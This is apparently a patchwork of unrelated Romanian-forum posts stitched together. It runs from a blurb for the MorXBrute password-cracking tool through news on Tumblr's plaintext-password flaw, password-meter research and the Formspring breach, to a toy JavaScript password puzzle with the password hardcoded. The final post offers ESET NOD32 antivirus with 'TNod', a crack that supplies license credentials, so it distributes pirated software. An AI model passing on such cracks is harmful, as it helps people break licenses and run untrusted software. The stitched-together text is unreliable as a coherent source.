simo_at_morxploit_com Make sure to include software/service details such as name, URL and version number Also please feel free to submit all your suggestions and bugs. Thanks and happy MorXBruteForcing! Source: MorXBrute HTTP Password cracking tool

An alarmingly large security flaw made its way past Tumblr's oversight. Ever logged in to Tumblr on your iPhone or iPad? How about while logged in on a public Wi-Fi connection? If you answered yes to any of the above, you may want to change your Tumblr password ASAP. Tumblr has just made users aware of a serious privacy compromise that enables anybody with the ability to “sniff” traffic on public Wi-Fi networks to view Tumblr users’ passwords in unencrypted plain-text format. The problem arose because the iPad and iPhone apps fail to log users in through a secure server. An official Tumblr announcement urges Tumblr users to change their passwords immediately if they’ve used the app, and to download the newest version of the app as soon as possible: According to the Register, a reader found the bug by chance while evaluating the Tumblr apps for suitable use on his employer’s smartphones. It’s a surprisingly enormous security hole for the Yahoo-bought company to overlook. Anybody who has ever accessed Tumblr over public Wi-Fi from a mobile device, whether at an airport, a coffee shop, or a library, is at risk. Fortunately, Tumblr users don’t seem to be reporting any serious consequences. The Tumblr #password and #security tags abound with users spreading the news, but not with sob stories about compromised accounts. Even if a user does find her account has been compromised, it will be hard to peg it on this security breach in particular. Via: Time To Change Your Tumblr Password—Immediately – ReadWrite

Odata cu ziua parolei scrisa de em a aparut in aceeasi sfera si un articol despre parole. Sursa articolului: Ars Technica Does your password go up to 11? Probably not. But one day it could. If you've ever been nagged about the weakness of your password while changing account credentials on Google, Facebook, or any number of other sites, you may have wondered: do these things actually make people choose stronger passcodes? A team of scientists has concluded that the meters do work—or at least they have the potential to do so, assuming they're set up correctly. The researchers—from the University of California at Berkeley, the University of British Columbia in Vancouver, and Microsoft—are among the first to test the effect that the ubiquitous password meters have on real users choosing passwords. They found that meters grading the strength of passwords had a measurable impact in helping users pick stronger passcodes that weren't used on other accounts. But the group also discovered these new, stronger passwords weren't any harder for users to remember than weaker ones. The scientists were quick to point out caveats to their findings. For one, the meters provided little benefit when users were choosing passwords while setting up a new account, as opposed to changing passwords for an already established account. And the meters provided no improvement for accounts people considered unimportant. "Within that context they're much more likely to just enter a password that they already used elsewhere because they either don't care about those accounts or that's just normally what they do when they enroll in a new account," Serge Egelman, a research scientist at UC Berkeley and the lead author of the paper, told Ars. "Whereas we show that in a different context—when changing passwords for high-value accounts—then the meters actually do have an observable effect on behavior in that people do choose stronger passwords. And ironically that's the context where we're least likely to see real meters in real life." The researchers' paper—titled Does My Password Go up to Eleven? The impact of Password Meters on Password Selection—is important because it provides useful guidance to both end users and the security professionals who work to protect them. While more and more sites now offer these meters, Egelman said a surprising number of online banking services and corporate intranets don't yet offer them. Remarkably, neither Microsoft Windows nor Apple's OS X for Macs uses meters for users who are choosing or changing account passwords. The findings come from an experiment in which affiliates of the University of British Columbia were brought to a laboratory and asked to test the usability of a portal that students, faculty, and staff use to access e-mail, view grades, and check out library books. As soon as they successfully logged into their account, they were presented with a notice requiring them to change their password. While the plaintext was never recorded, the laboratory computer did store a cryptographic hash of the passwords. It also measured other characteristics of both the old and new passwords, including the length and whether they used upper- and lower-case letters, numbers, and special characters. Some of the subjects were presented with one of two types of password meters that rated the strength of the new password, while a control group saw no meter at all. The password meters presented to the test subjects used "zero-order entropy," a technique many meters use to measure password strength. One set of "existing motivator" meters used the measures to rate passwords as "weak," "medium," or "strong." A second set of "peer-pressure motivator" meters used the same data to present the strength of the new password relative to all the users of the system. In turns out that the subjects who were presented with either type of meter picked significantly "stronger" passwords than those in the control group. The average zero-order entropy of passwords chosen with guidance from the existing motivator meter increased to 60.8 and the entropy of passwords chosen with the peer-pressure motivator grew to 64.9 bits. This means the total number of combinations required to brute-force crack the passwords would be 260.8 and 264.9 respectively. Subjects who saw no meter at all chose passwords that on average were 49.3 bits strong, about the same as the old passwords from all three groups. "Overall, we observed that both password meters yielded statistically significant differences when compared to the control condition," the researchers reported in the paper. (The findings were recently presented at the CM SIGCHI Conference on Human Factors in Computing Systems in Paris.) In addition to increasing entropy metrics, the researchers found other indications of improved strength. Passwords generated with the help of meters increased from a median of 9.0 to 10.0 characters, included more special characters, and contained more lower-case letters (from a median of 6.0 to 7.0). "Thus, the meters motivated participants to create longer passwords through the inclusion of symbols and additional lower-case letters," the researchers said. The subjects were invited back to the laboratory two weeks later and another encouraging finding came up. Those who had chosen stronger passwords with the help of the meter had no more trouble remembering their new passcodes than those who had chosen weaker passwords without using a meter. What's more, those with stronger passwords were no more likely to have reverted back to their old one than those who had chosen weaker passwords. Building a better mousetrap It's encouraging to know that password meters have a measurable effect on the passwords chosen by end users. But sadly there's no guarantee meters will actually help people choose passcodes that are more resistant to real-world cracking techniques. That's because the widely used zero-order entropy rating system is a poor metric for measuring the strength of passwords. The strength of the passcodes "Pa$$word1" and "$ecretPa$$word1" (minus the quotes) is 59.1bits and 98.5bits respectively. That's much higher than many passwords offer. What the scoring system fails to account for is that both passwords are so widely used that they're inevitably included in wordlists used in cracking attacks. These are among the first passwords to fall in typical cracking attacks. By contrast, the password "lkx8q2pe0" is considerably stronger because it would require time-consuming brute-force techniques to crack it, and yet it offers just 46.5 bits. (Bits are calculated by x * log_2(y), where x is the number of characters in a passcode and y is the number of available letters, numbers, or special characters). What this means is that password meters have the ability to help end users choose more crack-resistant passcodes only if the meters are set up correctly. As Ars documented last week, a password advice site from Intel can't be trusted to help users pick passcodes because the methodology it uses is hopelessly flawed. The password meters used in the study and offered on many sites suffer from the same type of weakness, but there's no reason they can't be drastically improved—for instance, by banning the one million most commonly used words. Egelman said there's no evidence to suggest improved meters wouldn't generate the same measurable effect in guiding people's choice of passwords. "They don't know what algorithm we're using to drive the meter," he said. "They just know that they do some behavior, they get some feedback, and they keep trying until [they get] feedback they're happy with. I suspect that if we changed what the feedback is based on we would still have the impact on them."

The question-and-answer site informs users that some of their passwords may have been breached in a security intrusion. Formspring has suffered a security intrusion in which some of its user passwords may have been breached, the question-and-answer site warned today. Formspring, which said it only learned of the network intrusion this morning, responded by disabling all users' passwords. "We apologize for the inconvenience but prefer to play it safe and have asked all members to reset their passwords," Formspring founder and CEO Ade Olonoh said in a company blog post. "Users will be prompted to change their passwords when they log back into Formspring. " A Formspring spokesperson told CNET that the company was tipped off to breach by someone who spotted about 420,000 passwords posted to a security forum that appeared to come from Formspring. "Once we were able to verify that the hashes were obtained from Formspring, we locked down our systems and began an investigation to determine the nature of the breach," Dorothee Fisher said. "We found that someone had accessed into one of our development servers and was able to extract account information from a production database. We were able to immediately fix the hole and are reviewing our internal security policies and practices to help ensure that this never happens again." The San Francisco-based startup, which launched its site in 2009, announced earlier this year that it had nearly 28 million users. In the blog's comments section, many dissatisfied users expressed a desire to have their accounts deleted, but a company representative assured them that their passwords had all been "salted," a cryptography technique that makes it harder to uncover the actual password. The blog went on to give users a tutorial in creating strong passwords -- a helpful reminder in the wake of more high-profile password thefts at LinkedIn, eHarmony, and Last.fm. Their users passwords were among approximately 8 million posted in two separate lists to hacker sites in early June. It appears that while they were hashed, they were not salted Source Formspring disables user passwords in security breach | Security & Privacy - CNET News

Google Chrome password protected Rohos

<html> <head> <script type="text/javascript"> function show_prompt() { var pass=prompt("Password?","******"); var pass1 = "rst" if (pass === pass1) { document.write("<p>The password is: " + pass + "! Bravo!!!</p>"); } else { document.write("<p>Wrong! "+ pass +"</p>") } } </script> </head> <body> <p>Password:</p> <input type="button" onclick="show_prompt()" value="Login" /> </body> </html> Care e parola? PS : Lasati nobii sa incerce!

Aflati parola! Succes site.html - Solidfiles PM pt ceva Hint! Hint1: HTML Password Lock Hint2: username = Admin

NOD32 v4 +autoupdate user&pass. Download Link: MEGAUPLOAD.COM Installation guide: 1.- Install "ESET NOD32 Antivirus 4.0.314.0 32 bits" 2.- Install "TNod-1.4.0.15-setup" (acesta adaug? automat user ?i pass la nod) 3.- Prima data trebuie sa actualizezi db manual, dup? aceea se actualizeaz? singur. *original post*